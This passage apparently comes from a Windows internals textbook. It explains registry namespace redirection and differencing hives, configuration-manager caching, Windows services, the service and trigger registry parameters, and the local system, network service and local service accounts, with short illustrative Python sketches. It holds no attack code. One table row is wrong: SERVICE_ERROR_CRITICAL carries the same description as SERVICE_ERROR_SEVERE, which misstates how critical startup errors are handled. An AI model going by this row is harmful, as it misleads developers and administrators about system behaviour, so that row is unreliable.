sends a Create Namespace Node IOCTL to the VReg’s device and specifies the virtual key path (which
will be seen by the container), the real host key path, and the container’s job handle. As a response,
the VReg driver creates a new namespace node (a small data structure that contains the key’s data and
some flags) and adds it to the silo’s configuration context.
After the application has finished configuring all the registry redirections for the container, it at-
taches its own process (or a new spawned process) to the silo object (using AssignProcessToJobObject—
see Chapter 3 in Part 1 for more details). From this point forward, each registry I/O emitted by the
containerized process will be intercepted by the VReg registry minifilter. Let’s illustrate how namespace
redirection works through an example.
Let’s assume that the modern application framework has set multiple registry namespace redirec-
tions for a Centennial application. In particular, one of the redirection nodes redirects keys from HKCU
to the host \Registry\WC\a20834ea-8f46-c05f-46e2-a1b71f9f2f9cuser_sid key. At a certain point
in time, the Centennial application wants to create a new key named AppA in the HKCU\Software\
Microsoft parent key. When the process calls the RegCreateKeyEx API, the VReg registry callback intercepts the request and gets the job's configuration context. It then searches the context for the closest
namespace node to the key path specified by the caller. If it does not find one, it returns an
object not found error: Operating on nonvirtualized paths is not allowed for a container. Assuming that
a namespace node describing the root HKCU key exists in the context, and the node is a parent of the
HKCU\Software\Microsoft subkey, the VReg driver replaces the relative path of the original virtual key
with the parent host key name and forwards the request to the configuration manager. So, in this case
the configuration manager really sees a request to create \Registry\WC\a20834ea-8f46-c05f-46e2-
a1b71f9f2f9cuser_sid\Software\Microsoft\AppA and succeeds. The containerized application does not
really detect any difference. From the application side, the registry key is in the host HKCU.
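The redirection step in this example can be sketched as a longest-prefix lookup over the silo's namespace nodes; the node table and the host key name below are hypothetical placeholders, not the real GUID-based paths.

```python
def redirect(namespace_nodes, virtual_path):
    """namespace_nodes: dict mapping a virtual key prefix to the host
    key it redirects to. Returns the rewritten path, or None when the
    path is not covered by any node (nonvirtualized paths are not
    allowed for a container)."""
    best = None
    for prefix in namespace_nodes:
        # Component-safe prefix check (case-insensitive, like the registry).
        if (virtual_path.lower() + "\\").startswith(prefix.lower() + "\\"):
            if best is None or len(prefix) > len(best):
                best = prefix                    # closest (deepest) node
    if best is None:
        return None                             # "object not found"
    return namespace_nodes[best] + virtual_path[len(best):]
```

For example, with a node mapping HKCU to a hypothetical host key \Registry\WC\example_user_sid, a create of HKCU\Software\Microsoft\AppA is rewritten to \Registry\WC\example_user_sid\Software\Microsoft\AppA before being forwarded to the configuration manager.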
Differencing hives
While namespace redirection is implemented in the VReg driver and is available only in contain-
erized environments, registry merging can also work globally and is implemented mainly in the
configuration manager itself. (However, the VReg driver is still used as an entry-point, allowing the
mounting of differencing hives to base keys.) As stated in the previous section, differencing hives use
hive version 1.6, which is very similar to version 1.5 but supports metadata for the differencing keys.
Increasing the hive version also prevents the possibility of mounting the hive in systems that do not
support registry virtualization.
An application can create a differencing hive and mount it globally in the system or in a silo con-
tainer by sending IOCTLs to the VReg device. The Backup and Restore privileges are needed, though,
so only administrative applications can manage differencing hives. To mount a differencing hive, the
application fills a data structure with the name of the base key (called the base layer; a base layer is the
root key to which all the subkeys and values contained in the differencing hive apply), the path of
the differencing hive, and a mount point. It then sends the data structure to the VReg driver through
the VR_LOAD_DIFFERENCING_HIVE control code. The mount point contains a merge of the data con-
tained in the differencing hive and the data contained in the base layer.
The VReg driver maintains a list of all the loaded differencing hives in a hash table. This allows the
VReg driver to mount a differencing hive in multiple mount points. As introduced previously, the
Modern Application Model uses random GUIDs in the \Registry\WC root key with the goal of mounting
independent Centennial applications’ differencing hives. After an entry in the hash table is created,
the VReg driver simply forwards the request to the CmLoadDifferencingKey internal configuration
manager’s function. The latter performs the majority of the work. It calls the registry callbacks and
loads the differencing hive. The creation of the hive proceeds in a similar way as for a normal hive. After
the hive is created by the lower layer of the configuration manager, a key control block data structure
is also created. The new key control block is linked to the base layer key control block.
When a request is directed to open or read values located in the key used as a mount point, or
in a child of it, the configuration manager knows that the associated key control block represents a
differencing hive. So, the parsing procedure starts from the differencing hive. If the configuration
manager encounters a subkey in the differencing hive, it stops the parsing procedure and yields the
keys and data stored in the differencing hive. Otherwise, in case no data is found in the differencing
hive, the configuration manager restarts the parsing procedure from the base hive. Another case verifies whether a tombstone key is found in the differencing hive: the configuration manager hides the
searched key and returns no data (or an error). Tombstones are indeed used to mark a key as deleted
in the base hive.
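The merge-on-read logic just described can be sketched as follows. This is an assumed simplification of the semantics, not the configuration manager's real code: look in the differencing hive first, let a tombstone hide the base key, and otherwise fall back to the base hive.

```python
# Sentinel marking a key deleted in the differencing layer (a "tombstone").
TOMBSTONE = object()

def lookup(key, diff_hive: dict, base_hive: dict):
    if key in diff_hive:
        value = diff_hive[key]
        if value is TOMBSTONE:       # key was deleted in the diff layer
            return None              # hidden: report "no data"
        return value                 # the differencing layer wins
    return base_hive.get(key)        # otherwise fall back to the base layer

base = {"Version": 1, "Legacy": True}
diff = {"Version": 2, "Legacy": TOMBSTONE}
assert lookup("Version", diff, base) == 2     # overridden by the diff hive
assert lookup("Legacy", diff, base) is None   # tombstoned: hidden
```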
The system supports three kinds of differencing hives:
■ Mutable hives can be written and updated. All the write requests directed to the mount point (or to its children keys) are stored in the differencing hive.
■ Immutable hives can’t be modified. This means that all the modifications requested on a key that is located in the differencing hive will fail.
■ Write-through hives represent differencing hives that are immutable, but write requests directed to the mount point (or its children keys) are redirected to the base layer (which is not immutable anymore).
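The write semantics of the three kinds can be summarized in a small sketch. The class and method names here are illustrative, not Windows APIs; only the routing of the write differs per kind.

```python
class DiffHiveMount:
    """Illustrative model of a mounted differencing hive."""

    def __init__(self, kind):
        self.kind = kind      # "mutable" | "immutable" | "write-through"
        self.diff = {}        # differencing layer
        self.base = {}        # base layer

    def write(self, key, value):
        if self.kind == "mutable":
            self.diff[key] = value       # writes land in the diff hive
        elif self.kind == "immutable":
            raise PermissionError("immutable differencing hive")
        elif self.kind == "write-through":
            self.base[key] = value       # redirected to the base layer

m = DiffHiveMount("mutable");       m.write("A", 1)
w = DiffHiveMount("write-through"); w.write("A", 1)
assert m.diff == {"A": 1} and w.base == {"A": 1}
```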
The NT kernel and applications can also mount a differencing hive and then apply namespace
redirection on the top of its mount point, which allows the implementation of complex virtualized
configurations like the one employed for Centennial applications (shown in Figure 10-7). The Modern
Application Model and the architecture of Centennial applications are covered in Chapter 8.
FIGURE 10-7 Registry virtualization of the software hive in the Modern Application Model for Centennial applications.
Registry optimizations
The configuration manager makes a few noteworthy performance optimizations. First, virtually every
registry key has a security descriptor that protects access to the key. However, storing a unique security
descriptor copy for every key in a hive would be highly inefficient because the same security settings
often apply to entire subtrees of the registry. When the system applies security to a key, the configura-
tion manager checks a pool of the unique security descriptors used within the same hive as the key
to which new security is being applied, and it shares any existing descriptor for the key, ensuring that
there is at most one copy of every unique security descriptor in a hive.
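The descriptor-sharing idea is essentially interning: before storing a new security descriptor, check a per-hive pool of the unique descriptors already present and reuse an existing one. The data structures below are illustrative, not the configuration manager's.

```python
class Hive:
    """Minimal sketch of per-hive security-descriptor pooling."""

    def __init__(self):
        self._descriptor_pool = {}   # descriptor bytes -> shared instance

    def set_security(self, key, descriptor: bytes) -> bytes:
        # Reuse an identical descriptor already stored in this hive, so
        # each unique descriptor exists at most once per hive.
        return self._descriptor_pool.setdefault(descriptor, descriptor)

hive = Hive()
d1 = hive.set_security(r"HKLM\Software\A", b"O:SYG:SYD:(A;;KA;;;SY)")
d2 = hive.set_security(r"HKLM\Software\B", b"O:SYG:SYD:(A;;KA;;;SY)")
assert d1 is d2                        # one stored copy, shared by both keys
assert len(hive._descriptor_pool) == 1
```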
The configuration manager also optimizes the way it stores key and value names in a hive. Although
the registry is fully Unicode-capable and specifies all names using the Unicode convention, if a name
contains only ASCII characters, the configuration manager stores the name in ASCII form in the hive.
When the configuration manager reads the name (such as when performing name lookups), it converts
the name into Unicode form in memory. Storing the name in ASCII form can significantly reduce the
size of a hive.
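The size saving is easy to see in a sketch: an ASCII-only name costs one byte per character, while a Unicode name stored as UTF-16 (the registry's native Unicode form) costs two. The helper below is illustrative, not the hive format's actual encoder.

```python
def stored_name_bytes(name: str) -> bytes:
    """Store a key/value name compactly if it is pure ASCII."""
    try:
        return name.encode("ascii")      # compressed form: 1 byte per char
    except UnicodeEncodeError:
        return name.encode("utf-16-le")  # Unicode form: 2 bytes per char

assert len(stored_name_bytes("Control")) == 7    # ASCII: 7 bytes
assert len(stored_name_bytes("naïve")) == 10     # non-ASCII: 2 bytes/char
```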
To minimize memory usage, key control blocks don’t store full key registry path names. Instead,
they reference only a key’s name. For example, a key control block that refers to \Registry\System\
Control would refer to the name Control rather than to the full path. A further memory optimization is
that the configuration manager uses key name control blocks to store key names, and all key control
blocks for keys with the same name share the same key name control block. To optimize performance,
the configuration manager stores the key control block names in a hash table for quick lookups.
To provide fast access to key control blocks, the configuration manager stores frequently accessed
key control blocks in the cache table, which is configured as a hash table. When the configuration
manager needs to look up a key control block, it first checks the cache table. Finally, the configuration
manager has another cache, the delayed close table, that stores key control blocks that applications
close so that an application can quickly reopen a key it has recently closed. To optimize lookups, these
cache tables are stored for each hive. The configuration manager removes the oldest key control blocks
from the delayed close table as it adds the most recently closed blocks to the table.
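The delayed close table behaves like a small least-recently-closed cache. The sketch below is an assumption about the eviction policy as described, with illustrative names and an arbitrary capacity, not the real kernel structure.

```python
from collections import OrderedDict

class DelayedCloseTable:
    """Per-hive cache of recently closed key control blocks (KCBs)."""

    def __init__(self, capacity=4):
        self.capacity = capacity
        self._table = OrderedDict()      # key path -> key control block

    def close(self, path, kcb):
        self._table[path] = kcb
        self._table.move_to_end(path)    # newest entries at the end
        if len(self._table) > self.capacity:
            self._table.popitem(last=False)   # evict the oldest block

    def reopen(self, path):
        # A hit lets the application reopen the key without rebuilding
        # the key control block.
        return self._table.pop(path, None)

t = DelayedCloseTable(capacity=2)
t.close(r"\Registry\Machine\A", "kcb-A")
t.close(r"\Registry\Machine\B", "kcb-B")
t.close(r"\Registry\Machine\C", "kcb-C")       # evicts A, the oldest
assert t.reopen(r"\Registry\Machine\A") is None
assert t.reopen(r"\Registry\Machine\C") == "kcb-C"
```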
Windows services
Almost every operating system has a mechanism to start processes at system startup time not tied
to an interactive user. In Windows, such processes are called services or Windows services. Services
are similar to UNIX daemon processes and often implement the server side of client/server applica-
tions. An example of a Windows service might be a web server because it must be running regardless
of whether anyone is logged on to the computer, and it must start running when the system starts so
that an administrator doesn’t have to remember, or even be present, to start it.
Windows services consist of three components: a service application, a service control program
(SCP), and the Service Control Manager (SCM). First, we describe service applications, service accounts,
user and packaged services, and all the operations of the SCM. Then we explain how autostart services
are started during the system boot. We also cover the steps the SCM takes when a service fails during
its startup and the way the SCM shuts down services. We end with the description of the Shared service
process and how protected services are managed by the system.
Service applications
Service applications, such as web servers, consist of at least one executable that runs as a Windows
service. A user who wants to start, stop, or configure a service uses an SCP. Although Windows supplies
built-in SCPs (the most common are the command-line tool sc.exe and the user interface provided
by the services.msc MMC snap-in) that provide generic start, stop, pause, and continue functionality,
some service applications include their own SCP that allows administrators to specify configuration set-
tings particular to the service they manage.
Service applications are simply Windows executables (GUI or console) with additional code to
receive commands from the SCM as well as to communicate the application’s status back to the SCM.
Because most services don’t have a user interface, they are built as console programs.
When you install an application that includes a service, the application’s setup program (which
usually acts as an SCP too) must register the service with the system. To register the service, the setup
program calls the Windows CreateService function, a services-related function exported in Advapi32.dll
(%SystemRoot%\System32\Advapi32.dll). Advapi32, the Advanced API DLL, implements only a
small portion of the client-side SCM APIs. All the most important SCM client APIs are implemented in
another DLL, Sechost.dll, which is the host library for SCM and LSA client APIs. All the SCM APIs not
implemented in Advapi32.dll are simply forwarded to Sechost.dll. Most of the SCM client APIs commu-
nicate with the Service Control Manager through RPC. SCM is implemented in the Services.exe binary.
More details are described later in the “Service Control Manager” section.
When a setup program registers a service by calling CreateService, an RPC call is made to the SCM
instance running on the target machine. The SCM then creates a registry key for the service under
HKLM\SYSTEM\CurrentControlSet\Services. The Services key is the nonvolatile representation of the
SCM’s database. The individual keys for each service define the path of the executable image that con-
tains the service as well as parameters and configuration options.
After creating a service, an installation or management application can start the service via the
StartService function. Because some service-based applications also must initialize during the boot
process to function, it’s not unusual for a setup program to register a service as an autostart service,
ask the user to reboot the system to complete an installation, and let the SCM start the service as the
system boots.
When a program calls CreateService, it must specify a number of parameters describing the service’s
characteristics. The characteristics include the service’s type (whether it’s a service that runs in its own
process rather than a service that shares a process with other services), the location of the service’s
executable image file, an optional display name, an optional account name and password used to start
the service in a particular account’s security context, a start type that indicates whether the service
starts automatically when the system boots or manually under the direction of an SCP, an error code
that indicates how the system should react if the service detects an error when starting, and, if the
service starts automatically, optional information that specifies when the service starts relative to other
services. While delay-loaded services have been supported since Windows Vista, Windows 7 introduced support for Triggered services, which are started or stopped when one or more specific events occur.
An SCP can specify trigger event information through the ChangeServiceConfig2 API.
A service application runs in a service process. A service process can host one or more service
applications. When the SCM starts a service process, the process must immediately invoke the
StartServiceCtrlDispatcher function (before a well-defined timeout expires—see the “Service logon”
section for more details). StartServiceCtrlDispatcher accepts a list of entry points into services, with one
entry point for each service in the process. Each entry point is identified by the name of the service
the entry point corresponds to. After making a local RPC (ALPC) communications connection to the
SCM (which acts as a pipe), StartServiceCtrlDispatcher waits in a loop for commands to come through
the pipe from the SCM. Note that the handle of the connection is saved by the SCM in an internal
list, which is used for sending and receiving service commands to the right process. The SCM sends
a service-start command each time it starts a service the process owns. For each start command it
receives, the StartServiceCtrlDispatcher function creates a thread, called a service thread, to invoke
the starting service’s entry point (ServiceMain) and implement the command loop for the service.
StartServiceCtrlDispatcher waits indefinitely for commands from the SCM and returns control to the
process’s main function only when all the process’s services have stopped, allowing the service process
to clean up resources before exiting.
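The dispatcher's control flow can be simulated in a few lines. This single-process sketch uses hypothetical names and plain threads in place of ALPC and Windows service threads: the dispatcher maps service names to entry points, spawns a service thread per start command, and returns only once every service has stopped.

```python
import threading

def start_service_ctrl_dispatcher(service_table, commands):
    """Toy model of StartServiceCtrlDispatcher's command loop."""
    threads = []
    for command, name in commands:            # commands "from the SCM"
        if command == "start" and name in service_table:
            # One service thread per start command, running ServiceMain.
            t = threading.Thread(target=service_table[name], name=name)
            t.start()
            threads.append(t)
    for t in threads:
        t.join()       # return control only when all services have stopped

results = []
def my_service_main():          # the service entry point (ServiceMain)
    results.append("initialized")

start_service_ctrl_dispatcher({"MySvc": my_service_main},
                              [("start", "MySvc")])
assert results == ["initialized"]
```

A real ServiceMain would also register its control handler and report status back to the SCM, as the following paragraphs describe.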
A service entry point’s (ServiceMain) first action is to call the RegisterServiceCtrlHandler function.
This function receives and stores a pointer to a function, called the control handler, which the ser-
vice implements to handle various commands it receives from the SCM. RegisterServiceCtrlHandler
doesn’t communicate with the SCM, but it stores the function in local process memory for the
StartServiceCtrlDispatcher function. The service entry point continues initializing the service, which can
include allocating memory, creating communications end points, and reading private configuration
data from the registry. As explained earlier, a convention most services follow is to store their param-
eters under a subkey of their service registry key, named Parameters.
While the entry point is initializing the service, it must periodically send status messages, using the
SetServiceStatus function, to the SCM indicating how the service’s startup is progressing. After the
entry point finishes initialization (the service indicates this to the SCM through the SERVICE_RUNNING
status), a service thread usually sits in a loop waiting for requests from client applications. For example,
a web server would initialize a TCP listen socket and wait for inbound HTTP connection requests.
A service process’s main thread, which executes in the StartServiceCtrlDispatcher function, receives
SCM commands directed at services in the process and invokes the target service’s control handler
function (stored by RegisterServiceCtrlHandler). SCM commands include stop, pause, resume, interro-
gate, and shutdown or application-defined commands. Figure 10-8 shows the internal organization of
a service process—the main thread and the service thread that make up a process hosting one service.
1. StartServiceCtrlDispatcher launches service thread.
2. Service thread registers control handler.
3. StartServiceCtrlDispatcher calls handlers in response to SCM commands.
4. Service thread processes client requests.
FIGURE 10-8 Inside a service process.
Service characteristics
The SCM stores each characteristic as a value in the service’s registry key. Figure 10-9 shows an example
of a service registry key.
FIGURE 10-9 Example of a service registry key.
Table 10-7 lists all the service characteristics, many of which also apply to device drivers. (Not every
characteristic applies to every type of service or device driver.)
Note The SCM does not access a service’s Parameters subkey until the service is deleted,
at which time the SCM deletes the service’s entire key, including subkeys like Parameters.
TABLE 10-7 Service and Driver Registry Parameters
Value Name / Value Setting / Value Setting Description
Start
SERVICE_BOOT_START (0x0)
Winload preloads the driver so that it is in memory dur-
ing the boot. These drivers are initialized just prior to
SERVICE_SYSTEM_START drivers.
SERVICE_SYSTEM_START (0x1)
The driver loads and initializes during kernel initializa-
tion after SERVICE_BOOT_START drivers have initialized.
SERVICE_AUTO_START (0x2)
The SCM starts the driver or service after the SCM pro-
cess, Services.exe, starts.
SERVICE_DEMAND_START (0x3)
The SCM starts the driver or service on demand (when a
client calls StartService on it, when it is trigger-started, or when
another starting service depends on it).
SERVICE_DISABLED (0x4)
The driver or service cannot be loaded or initialized.
ErrorControl
SERVICE_ERROR_IGNORE (0x0)
Any error the driver or service returns is ignored, and no
warning is logged or displayed.
SERVICE_ERROR_NORMAL (0x1)
If the driver or service reports an error, an event log
message is written.
SERVICE_ERROR_SEVERE (0x2)
If the driver or service returns an error and last known
good isn’t being used, reboot into last known good;
otherwise, log an event message.
SERVICE_ERROR_CRITICAL (0x3)
If the driver or service returns an error and last known
good isn’t being used, reboot into last known good;
otherwise, log an event message.
Type
SERVICE_KERNEL_DRIVER (0x1)
Device driver.
SERVICE_FILE_SYSTEM_DRIVER (0x2)
Kernel-mode file system driver.
SERVICE_ADAPTER (0x4)
Obsolete.
SERVICE_RECOGNIZER_DRIVER (0x8)
File system recognizer driver.
SERVICE_WIN32_OWN_PROCESS
(0x10)
The service runs in a process that hosts only one service.
SERVICE_WIN32_SHARE_PROCESS
(0x20)
The service runs in a process that hosts multiple services.
SERVICE_USER_OWN_PROCESS
(0x50)
The service runs with the security token of the logged-in
user in its own process.
SERVICE_USER_SHARE_PROCESS
(0x60)
The service runs with the security token of the logged-in
user in a process that hosts multiple services.
SERVICE_INTERACTIVE_PROCESS
(0x100)
The service is allowed to display windows on the console
and receive user input, but only on the console session
(0) to prevent interacting with user/console applications
on other sessions. This option is deprecated.
Group
Group name
The driver or service initializes when its group is
initialized.
Tag
Tag number
The specified location in a group initialization order. This
parameter doesn’t apply to services.
ImagePath
Path to the service or driver execut-
able file
If ImagePath isn’t specified, the I/O manager looks for
drivers in %SystemRoot%\System32\Drivers. Required
for Windows services.
DependOnGroup
Group name
The driver or service won’t load unless a driver or service
from the specified group loads.
DependOnService
Service name
The service won’t load until after the specified service
loads. This parameter doesn’t apply to device drivers or
services with a start type different than SERVICE_AUTO_
START or SERVICE_DEMAND_START.
ObjectName
Usually LocalSystem, but it can
be an account name, such as .\
Administrator
Specifies the account in which the service will run. If
ObjectName isn’t specified, LocalSystem is the account
used. This parameter doesn’t apply to device drivers.
DisplayName
Name of the service
The service application shows services by this name. If
no name is specified, the name of the service’s registry
key becomes its name.
DeleteFlag
0 or 1 (TRUE or FALSE)
Temporary flag set by the SCM when a service is marked
to be deleted.
Description
Description of service
Up to 32,767-byte description of the service.
FailureActions
Description of actions the SCM
should take when the service process
exits unexpectedly
Failure actions include restarting the service process,
rebooting the system, and running a specified program.
This value doesn’t apply to drivers.
FailureCommand
Program command line
The SCM reads this value only if FailureActions specifies
that a program should execute upon service failure. This
value doesn’t apply to drivers.
DelayedAutoStart
0 or 1 (TRUE or FALSE)
Tells the SCM to start this service after a certain delay
has passed since the SCM was started. This reduces
the number of services starting simultaneously during
startup.
PreshutdownTimeout
Timeout in milliseconds
This value allows services to override the default pre-
shutdown notification timeout of 180 seconds. After this
timeout, the SCM performs shutdown actions on the
service if it has not yet responded.
ServiceSidType
SERVICE_SID_TYPE_NONE (0x0)
Backward-compatibility setting.
SERVICE_SID_TYPE_UNRESTRICTED
(0x1)
The SCM adds the service SID as a group owner to the
service process’s token when it is created.
SERVICE_SID_TYPE_RESTRICTED
(0x3)
The SCM runs the service with a write-restricted token,
adding the service SID to the restricted SID list of the
service process, along with the world, logon, and write-
restricted SIDs.
Alias
String
Name of the service’s alias.
RequiredPrivileges
List of privileges
This value contains the list of privileges that the service
requires to function. The SCM computes their union
when creating the token for the shared process related
to this service, if any.
Security
Security descriptor
This value contains the optional security descriptor that
defines who has what access to the service object cre-
ated internally by the SCM. If this value is omitted, the
SCM applies a default security descriptor.
LaunchProtected
SERVICE_LAUNCH_PROTECTED_
NONE (0x0)
The SCM launches the service unprotected (default value).
SERVICE_LAUNCH_PROTECTED_
WINDOWS (0x1)
The SCM launches the service in a Windows protected
process.
SERVICE_LAUNCH_PROTECTED_WINDOWS_LIGHT (0x2)
The SCM launches the service in a Windows protected
process light.
SERVICE_LAUNCH_PROTECTED_
ANTIMALWARE_LIGHT (0x3)
The SCM launches the service in an Antimalware pro-
tected process light.
SERVICE_LAUNCH_PROTECTED_
APP_LIGHT (0x4)
The SCM launches the service in an App protected pro-
cess light (internal only).
UserServiceFlags
USER_SERVICE_FLAG_DSMA_ALLOW
(0x1)
Allow the default user to start the user service.
USER_SERVICE_FLAG_NONDSMA_
ALLOW (0x2)
Do not allow the default user to start the service.
SvcHostSplitDisable
0 or 1 (TRUE or FALSE)
When set to 1, prohibits the SCM from enabling Svchost
splitting. This value applies only to shared services.
PackageFullName
String
Package full name of a packaged service.
AppUserModelId
String
Application user model ID (AUMID) of a packaged service.
PackageOrigin
PACKAGE_ORIGIN_UNSIGNED (0x1)
PACKAGE_ORIGIN_INBOX (0x2)
PACKAGE_ORIGIN_STORE (0x3)
PACKAGE_ORIGIN_DEVELOPER_
UNSIGNED (0x4)
PACKAGE_ORIGIN_DEVELOPER_
SIGNED (0x5)
These values identify the origin of the AppX package
(the entity that has created it).
Notice that Type values include three that apply to device drivers: device driver, file system driver,
and file system recognizer. These are used by Windows device drivers, which also store their param-
eters as registry data in the Services registry key. The SCM is responsible for starting non-PNP driv-
ers with a Start value of SERVICE_AUTO_START or SERVICE_DEMAND_START, so it’s natural for the
SCM database to include drivers. Services use the other types, SERVICE_WIN32_OWN_PROCESS and
SERVICE_WIN32_SHARE_PROCESS, which are mutually exclusive.
An executable that hosts just one service uses the SERVICE_WIN32_OWN_PROCESS type. In a
similar way, an executable that hosts multiple services specifies the SERVICE_WIN32_SHARE_PROCESS.
Hosting multiple services in a single process saves system resources that would otherwise be consumed
as overhead when launching multiple service processes. A potential disadvantage is that if one of the
services of a collection running in the same process causes an error that terminates the process, all the
services of that process terminate. Also, another limitation is that all the services must run under the
same account (however, if a service takes advantage of service security hardening mechanisms, it can
limit some of its exposure to malicious attacks). The SERVICE_USER_SERVICE flag is added to denote a
user service, which is a type of service that runs with the identity of the currently logged-on user.
Trigger information is normally stored by the SCM under another subkey named TriggerInfo.
Each trigger event is stored in a child key named as the event index, starting from 0 (for example,
the third trigger event is stored in the “TriggerInfo\2” subkey). Table 10-8 lists all the possible registry
values that compose the trigger information.
TABLE 10-8 Triggered services registry parameters
Value Name / Value Setting / Value Setting Description
Action
SERVICE_TRIGGER_ACTION_SERVICE_START (0x1)
Start the service when the trigger event occurs.
SERVICE_TRIGGER_ACTION_SERVICE_STOP (0x2)
Stop the service when the trigger event occurs.
Type
SERVICE_TRIGGER_TYPE_DEVICE_
INTERFACE_ARRIVAL (0x1)
Specifies an event triggered when a device of the speci-
fied device interface class arrives or is present when the
system starts.
SERVICE_TRIGGER_TYPE_IP_
ADDRESS_AVAILABILITY (0x2)
Specifies an event triggered when an IP address be-
comes available or unavailable on the network stack.
SERVICE_TRIGGER_TYPE_DOMAIN_
JOIN (0x3)
Specifies an event triggered when the computer joins or
leaves a domain.
SERVICE_TRIGGER_TYPE_FIREWALL_
PORT_EVENT (0x4)
Specifies an event triggered when a firewall port is
opened or closed.
SERVICE_TRIGGER_TYPE_GROUP_
POLICY (0x5)
Specifies an event triggered when a machine or user
policy change occurs.
SERVICE_TRIGGER_TYPE_NETWORK_
ENDPOINT (0x6)
Specifies an event triggered when a packet or request
arrives on a particular network protocol.
SERVICE_TRIGGER_TYPE_CUSTOM
(0x14)
Specifies a custom event generated by an ETW provider.
Guid
Trigger subtype GUID
A GUID that identifies the trigger event subtype. The
GUID depends on the Trigger type.
DataIndex
Trigger-specific data
Trigger-specific data for the service trigger event. This
value depends on the trigger event type.
DataTypeIndex
SERVICE_TRIGGER_DATA_TYPE_
BINARY (0x1)
The trigger-specific data is in binary format.
SERVICE_TRIGGER_DATA_TYPE_
STRING (0x2)
The trigger-specific data is in string format.
SERVICE_TRIGGER_DATA_TYPE_
LEVEL (0x3)
The trigger-specific data is a byte value.
SERVICE_TRIGGER_DATA_TYPE_
KEYWORD_ANY (0x4)
The trigger-specific data is a 64-bit (8 bytes) unsigned
integer value.
SERVICE_TRIGGER_DATA_TYPE_
KEYWORD_ALL (0x5)
The trigger-specific data is a 64-bit (8 bytes) unsigned
integer value.
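The zero-based TriggerInfo child-key naming scheme described above can be expressed as a one-line helper. The function name and the example service key are illustrative only.

```python
def trigger_subkey(service_key: str, event_index: int) -> str:
    """Registry path of the trigger event at a zero-based index."""
    return rf"{service_key}\TriggerInfo\{event_index}"

# The third trigger event of a service lands under index 2:
print(trigger_subkey(r"HKLM\SYSTEM\CurrentControlSet\Services\W32Time", 2))
```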
Service accounts
The security context of a service is an important consideration for service developers as well as for system
administrators because it dictates which resources the process can access. Most built-in services run in the
security context of an appropriate Service account (which has limited access rights, as described in the
following subsections). When a service installation program or the system administrator creates a service,
it usually specifies the security context of the local system account (displayed sometimes as SYSTEM and
other times as LocalSystem), which is very powerful. Two other built-in accounts are the network service
and local service accounts. These accounts have fewer capabilities than the local system account from a se-
curity standpoint. The following subsections describe the special characteristics of all the service accounts.
The local system account
The local system account is the same account in which core Windows user-mode operating system com-
ponents run, including the Session Manager (%SystemRoot%\System32\Smss.exe), the Windows subsys-
tem process (Csrss.exe), the Local Security Authority process (%SystemRoot%\System32\Lsass.exe), and
the Logon process (%SystemRoot%\System32\Winlogon.exe). For more information on these processes,
see Chapter 7 in Part 1.
From a security perspective, the local system account is extremely powerful—more powerful than
any local or domain account when it comes to security ability on a local system. This account has the
following characteristics:
■ It is a member of the local Administrators group. Table 10-9 shows the groups to which the local system account belongs. (See Chapter 7 in Part 1 for information on how group membership is used in object access checks.)
■ It has the right to enable all privileges (even privileges not normally granted to the local administrator account, such as creating security tokens). See Table 10-10 for the list of privileges assigned to the local system account. (Chapter 7 in Part 1 describes the use of each privilege.)
■ Most files and registry keys grant full access to the local system account. Even if they don’t grant full access, a process running under the local system account can exercise the take-ownership privilege to gain access.
■ Processes running under the local system account run with the default user profile (HKU\.DEFAULT). Therefore, they can’t directly access configuration information stored in the user profiles of other accounts (unless they explicitly use the LoadUserProfile API).
■ When a system is a member of a Windows domain, the local system account includes the machine security identifier (SID) for the computer on which a service process is running. Therefore, a service running in the local system account will be automatically authenticated on other machines in the same forest by using its computer account. (A forest is a grouping of domains.)
■ Unless the machine account is specifically granted access to resources (such as network shares, named pipes, and so on), a process can access network resources that allow null sessions—that is, connections that require no credentials. You can specify the shares and pipes on a particular computer that permit null sessions in the NullSessionPipes and NullSessionShares registry values under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters.
TABLE 10-9 Service account group membership (and integrity level)
Local System: Administrators; Everyone; Authenticated users; System integrity level
Network Service: Everyone; Users; Authenticated users; Local; Network service; Console logon; System integrity level
Local Service: Everyone; Users; Authenticated users; Local; Local service; Console logon; UWP capabilities groups; System integrity level
Service Account: Everyone; Users; Authenticated users; Local; Local service; All services; Write restricted; Console logon; High integrity level
TABLE 10-10 Service account privileges
Local System: SeAssignPrimaryTokenPrivilege, SeAuditPrivilege, SeBackupPrivilege, SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeCreateSymbolicLinkPrivilege, SeCreateTokenPrivilege, SeDebugPrivilege, SeDelegateSessionUserImpersonatePrivilege, SeImpersonatePrivilege, SeIncreaseBasePriorityPrivilege, SeIncreaseQuotaPrivilege, SeIncreaseWorkingSetPrivilege, SeLoadDriverPrivilege, SeLockMemoryPrivilege, SeManageVolumePrivilege, SeProfileSingleProcessPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege, SeTimeZonePrivilege, SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeUndockPrivilege (client only)
Local Service / Network Service: SeAssignPrimaryTokenPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeImpersonatePrivilege, SeIncreaseQuotaPrivilege, SeIncreaseWorkingSetPrivilege, SeShutdownPrivilege, SeSystemtimePrivilege, SeTimeZonePrivilege, SeUndockPrivilege (client only)
Service Account: SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeImpersonatePrivilege, SeIncreaseWorkingSetPrivilege, SeShutdownPrivilege, SeTimeZonePrivilege, SeUndockPrivilege
The network service account
The network service account is intended for use by services that want to authenticate to other ma-
chines on the network using the computer account, as does the local system account, but do not have
the need for membership in the Administrators group or the use of many of the privileges assigned to
the local system account. Because the network service account does not belong to the Administrators
group, services running in the network service account by default have access to far fewer registry keys,
file system folders, and files than the services running in the local system account. Further, the assign-
ment of few privileges limits the scope of a compromised network service process. For example, a pro-
cess running in the network service account cannot load a device driver or open arbitrary processes.
Another difference between the network service and local system accounts is that processes run-
ning in the network service account use the network service account’s profile. The registry component
of the network service profile loads under HKU\S-1-5-20, and the files and directories that make up the
component reside in %SystemRoot%\ServiceProfiles\NetworkService.
A service that runs in the network service account is the DNS client, which is responsible for resolv-
ing DNS names and for locating domain controllers.
The local service account
The local service account is virtually identical to the network service account with the important dif-
ference that it can access only network resources that allow anonymous access. Table 10-10 shows that
the network service account has the same privileges as the local service account, and Table 10-9 shows
